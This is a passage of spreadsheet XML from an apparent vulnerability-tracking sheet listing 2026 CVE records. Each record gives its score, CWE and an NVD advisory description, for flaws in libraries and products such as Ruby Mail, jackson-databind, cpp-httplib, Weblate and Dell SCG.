      <c r="G985" s="5" t="inlineStr"/>
      <c r="H985" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I985" s="5" t="inlineStr"/>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr"/>
      <c r="L985" s="5" t="inlineStr"/>
      <c r="M985" s="5" t="inlineStr"/>
      <c r="N985" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O985" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P985" s="5" t="inlineStr"/>
      <c r="Q985" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R985" s="5" t="inlineStr">
        <is>
          <t>Mail is an internet library for Ruby designed to handle email generation, parsing, and sending. Prior to 2.9.1, Mail::Utilities.q_value_decode and Mail::Utilities.b_value_decode used a single String#match and an overly greedy charset capture to decode only the first RFC 2047 encoded-word and mishandle surrounding or subsequent text. A crafted malformed encoded-word in an address display name or local part could cross ? delimiters and make decoded From, To, or Reply-To header values differ from the raw values inspected by a human reviewer or downstream parser, enabling apparent sender or recipient spoofing, phishing, or authorization-check bypass. This issue is fixed in version 2.9.1.</t>
        </is>
      </c>
      <c r="S985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63435</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64857</t>
        </is>
      </c>
      <c r="D986" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E986" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F986" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G986" s="5" t="inlineStr"/>
      <c r="H986" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I986" s="5" t="inlineStr"/>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr"/>
      <c r="L986" s="5" t="inlineStr"/>
      <c r="M986" s="5" t="inlineStr"/>
      <c r="N986" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O986" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P986" s="5" t="inlineStr"/>
      <c r="Q986" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="R986" s="5" t="inlineStr">
        <is>
          <t>tirreno, a security framework, has a session fixation issue in versions prior to 0.10.0. During authentication, tirreno validates the user's credentials and establishes the authenticated session, but it does not call `session_regenerate_id()` afterward. As a result, the session identifier is not rotated on login, it stays the same before and after authentication. An attacker able to fix a known session identifier in a victim's browser (for example through a network man-in-the-middle position, or a separate cross-site scripting or subdomain cookie-injection issue) could then gain access to the victim's authenticated session. The issue is fixed in v0.10.0. The session identifier is now regenerated on successful authentication, and the previous session is destroyed. There is no configuration-level workaround.</t>
        </is>
      </c>
      <c r="S986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64857</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73324</t>
        </is>
      </c>
      <c r="D987" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E987" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F987" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G987" s="5" t="inlineStr"/>
      <c r="H987" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I987" s="5" t="inlineStr"/>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr"/>
      <c r="L987" s="5" t="inlineStr"/>
      <c r="M987" s="5" t="inlineStr"/>
      <c r="N987" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O987" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P987" s="5" t="inlineStr"/>
      <c r="Q987" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-170</t>
        </is>
      </c>
      <c r="R987" s="5" t="inlineStr">
        <is>
          <t>Certain VLC media player builds in versions 3.0.0 through 3.0.23 contain a memory-safety vulnerability reachable when processing media from an attacker-controlled network source. Exploitation requires user interaction and may disclose a limited, layout-dependent amount of VLC process memory. Exposure depends on build configuration.</t>
        </is>
      </c>
      <c r="S987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73324</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73474</t>
        </is>
      </c>
      <c r="D988" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E988" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F988" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G988" s="5" t="inlineStr"/>
      <c r="H988" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I988" s="5" t="inlineStr"/>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr">
        <is>
          <t>entity_share_websub_project:entity_share_websub</t>
        </is>
      </c>
      <c r="L988" s="5" t="inlineStr"/>
      <c r="M988" s="5" t="inlineStr"/>
      <c r="N988" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O988" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P988" s="5" t="inlineStr"/>
      <c r="Q988" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R988" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) vulnerability in Drupal Entity Share Websub allows Server Side Request Forgery. This issue affects Entity Share Websub versions: from 0.0.0 to 1.1.2.</t>
        </is>
      </c>
      <c r="S988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73474</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73789</t>
        </is>
      </c>
      <c r="D989" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E989" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F989" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G989" s="5" t="inlineStr"/>
      <c r="H989" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I989" s="5" t="inlineStr"/>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr"/>
      <c r="L989" s="5" t="inlineStr"/>
      <c r="M989" s="5" t="inlineStr"/>
      <c r="N989" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O989" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P989" s="5" t="inlineStr"/>
      <c r="Q989" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R989" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of CPPM guest account management services could allow an unauthenticated remote attacker to manipulate account settings. Successful exploitation could allow an attacker to extend network access beyond policy limits, leading to unauthorized prolonged use of network resources.</t>
        </is>
      </c>
      <c r="S989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73789</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77310</t>
        </is>
      </c>
      <c r="D990" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E990" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F990" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G990" s="5" t="inlineStr"/>
      <c r="H990" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I990" s="5" t="inlineStr"/>
      <c r="J990" s="5" t="inlineStr">
        <is>
          <t>jackson-databind</t>
        </is>
      </c>
      <c r="K990" s="5" t="inlineStr"/>
      <c r="L990" s="5" t="inlineStr"/>
      <c r="M990" s="5" t="inlineStr"/>
      <c r="N990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O990" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P990" s="5" t="inlineStr"/>
      <c r="Q990" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R990" s="5" t="inlineStr">
        <is>
          <t>jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. Prior to versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1 on their respective release lines, the java.net.InetAddress branch of FromStringDeserializer.Std._deserialize() calls InetAddress.getByName() on attacker-controlled input, causing eager DNS resolution during deserialization and enabling DNS-based server-side request forgery and internal-host enumeration. This issue is fixed in versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1.</t>
        </is>
      </c>
      <c r="S990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77310</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77341</t>
        </is>
      </c>
      <c r="D991" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E991" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F991" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G991" s="5" t="inlineStr"/>
      <c r="H991" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I991" s="5" t="inlineStr"/>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr"/>
      <c r="L991" s="5" t="inlineStr"/>
      <c r="M991" s="5" t="inlineStr"/>
      <c r="N991" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O991" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P991" s="5" t="inlineStr"/>
      <c r="Q991" s="5" t="inlineStr">
        <is>
          <t>CWE-113, CWE-93</t>
        </is>
      </c>
      <c r="R991" s="5" t="inlineStr">
        <is>
          <t>cpp-httplib is a C++ header-only HTTP/HTTPS library. In version 0.49.0, the chunked-response trailer output path writes trailer header names and values directly to the socket without validating them, allowing CRLF sequences in a trailer field to inject additional headers or split the HTTP response. Unlike every other header-writing path in the library, the trailer-writing code applies none of the field-name and field-value checks that reject carriage return and line feed, so an application that places attacker-influenced data into a chunked response trailer emits attacker-controlled CRLF onto the wire. This enables HTTP response splitting, letting an attacker forge response headers or inject a second response. This issue is fixed in version 0.50.0.</t>
        </is>
      </c>
      <c r="S991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77341</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77507</t>
        </is>
      </c>
      <c r="D992" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E992" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F992" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G992" s="5" t="inlineStr"/>
      <c r="H992" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I992" s="5" t="inlineStr"/>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr"/>
      <c r="L992" s="5" t="inlineStr"/>
      <c r="M992" s="5" t="inlineStr"/>
      <c r="N992" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O992" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P992" s="5" t="inlineStr"/>
      <c r="Q992" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="R992" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.8, Weblate's object-scoped RSS feeds do not apply the permission checks used elsewhere, allowing unauthorized users to read change-history metadata from private projects and restricted components. On installations that permit anonymous access, this metadata can be retrieved without any authentication. The exposed information can include project and component identities, contributor usernames and full names, action types, timestamps, and translation or unit links, though translated-string content is not included in the feed. Installations using private projects or restricted components are affected. This issue is fixed in version 2026.8.</t>
        </is>
      </c>
      <c r="S992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77507</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79638</t>
        </is>
      </c>
      <c r="D993" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E993" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F993" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G993" s="5" t="inlineStr"/>
      <c r="H993" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I993" s="5" t="inlineStr"/>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L993" s="5" t="inlineStr"/>
      <c r="M993" s="5" t="inlineStr"/>
      <c r="N993" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O993" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P993" s="5" t="inlineStr"/>
      <c r="Q993" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R993" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Alternate XSS Syntax vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79638</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79741</t>
        </is>
      </c>
      <c r="D994" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E994" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F994" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G994" s="5" t="inlineStr"/>
      <c r="H994" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I994" s="5" t="inlineStr"/>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L994" s="5" t="inlineStr"/>
      <c r="M994" s="5" t="inlineStr"/>
      <c r="N994" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O994" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P994" s="5" t="inlineStr"/>
      <c r="Q994" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R994"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S994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79741</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79946</t>
        </is>
      </c>
      <c r="D995" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E995" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F995" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G995" s="5" t="inlineStr"/>
      <c r="H995" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I995" s="5" t="inlineStr"/>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L995" s="5" t="inlineStr"/>
      <c r="M995" s="5" t="inlineStr"/>
      <c r="N995" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O995" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P995" s="5" t="inlineStr"/>
      <c r="Q995" s="5" t="inlineStr">
        <is>
          <t>CWE-87</t>
        </is>
      </c>
      <c r="R995" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Alternate XSS Syntax vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79946</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79952</t>
        </is>
      </c>
      <c r="D996" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E996" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F996" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I996" s="5" t="inlineStr"/>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L996" s="5" t="inlineStr"/>
      <c r="M996" s="5" t="inlineStr"/>
      <c r="N996" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O996" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P996" s="5" t="inlineStr"/>
      <c r="Q996" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R996" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Encoding or Escaping of Output vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to launch of phishing attacks.</t>
        </is>
      </c>
      <c r="S996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79952</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79961</t>
        </is>
      </c>
      <c r="D997" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E997" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F997" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I997" s="5" t="inlineStr"/>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L997" s="5" t="inlineStr"/>
      <c r="M997" s="5" t="inlineStr"/>
      <c r="N997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O997" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P997" s="5" t="inlineStr"/>
      <c r="Q997" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R997"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S997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79961</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79964</t>
        </is>
      </c>
      <c r="D998" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E998" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F998" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I998" s="5" t="inlineStr"/>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L998" s="5" t="inlineStr"/>
      <c r="M998" s="5" t="inlineStr"/>
      <c r="N998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O998" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P998" s="5" t="inlineStr"/>
      <c r="Q998" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R998" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Escape, Meta, or Control Sequences vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to launch of phishing attacks.</t>
        </is>
      </c>
      <c r="S998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79964</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79965</t>
        </is>
      </c>
      <c r="D999" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E999" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F999" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I999" s="5" t="inlineStr"/>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L999" s="5" t="inlineStr"/>
      <c r="M999" s="5" t="inlineStr"/>
      <c r="N999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O999" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P999" s="5" t="inlineStr"/>
      <c r="Q999" s="5" t="inlineStr">
        <is>
          <t>CWE-625</t>
        </is>
      </c>
      <c r="R999" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an External Control of Critical State Data vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79965</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79971</t>
        </is>
      </c>
      <c r="D1000" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1000" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1000" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1000" s="5" t="inlineStr"/>
      <c r="H1000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1000" s="5" t="inlineStr"/>
      <c r="J1000" s="5" t="inlineStr"/>
      <c r="K1000" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1000" s="5" t="inlineStr"/>
      <c r="M1000" s="5" t="inlineStr"/>
      <c r="N1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1000" s="5" t="inlineStr"/>
      <c r="Q1000" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="R1000" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Sanitization of Custom Special Characters vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79971</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80174</t>
        </is>
      </c>
      <c r="D1001" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1001" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1001" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1001" s="5" t="inlineStr"/>
      <c r="J1001" s="5" t="inlineStr"/>
      <c r="K1001" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1001" s="5" t="inlineStr"/>
      <c r="M1001" s="5" t="inlineStr"/>
      <c r="N1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1001" s="5" t="inlineStr"/>
      <c r="Q1001" s="5" t="inlineStr">
